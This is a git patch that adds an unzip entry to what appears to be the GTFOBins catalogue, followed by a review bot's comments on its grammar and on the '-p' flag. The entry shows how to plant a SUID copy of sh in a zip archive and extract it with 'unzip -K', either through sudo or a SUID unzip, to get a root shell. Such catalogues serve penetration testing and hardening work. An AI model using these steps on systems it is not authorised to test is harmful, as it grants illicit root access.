From 2b769ace783f4ff68a913b26a441c66ff8ba18d6 Mon Sep 17 00:00:00 2001 From: Pablo <72967429+10rdP4@users.noreply.github.com> Date: Wed, 13 Jul 2022 15:03:27 +0200 Subject: [PATCH] Add unzip Co-authored-by: Andrea Cardaci --- _gtfobins/unzip.md | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 _gtfobins/unzip.md diff --git a/_gtfobins/unzip.md b/_gtfobins/unzip.md new file mode 100644 index 0000000..fff72b9 --- /dev/null +++ b/_gtfobins/unzip.md @@ -0,0 +1,21 @@ +--- +description: | + Certain `unzip` versions allows to preserve the SUID bit. Prepare an archive beforehand with the following commands as root: + + ``` + cp /bin/sh . + chmod +s sh + zip shell.zip sh + ``` + + Extract it on the target, then run the SUID shell as usual (omitting the `-p` where appropriate). +functions: + sudo: + - code: | + sudo unzip -K shell.zip + ./sh -p + suid: + - code: | + ./unzip -K shell.zip + ./sh -p +---
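Review bot: In the `description` text of the new `_gtfobins/unzip.md`, "Certain `unzip` versions allows to preserve the SUID bit" is ungrammatical and leaves the scope open. Suggest "Certain `unzip` versions allow preserving the SUID bit", and state which versions or builds accept `-K`, because both the `sudo` and `suid` entries depend on that flag and nothing in this file tells a reader whether a given system is affected. The description also says to run the result "as usual (omitting the `-p` where appropriate)" while both code entries hard-code `./sh -p`; a short clause saying when `-p` should be dropped would make the text and the entries consistent.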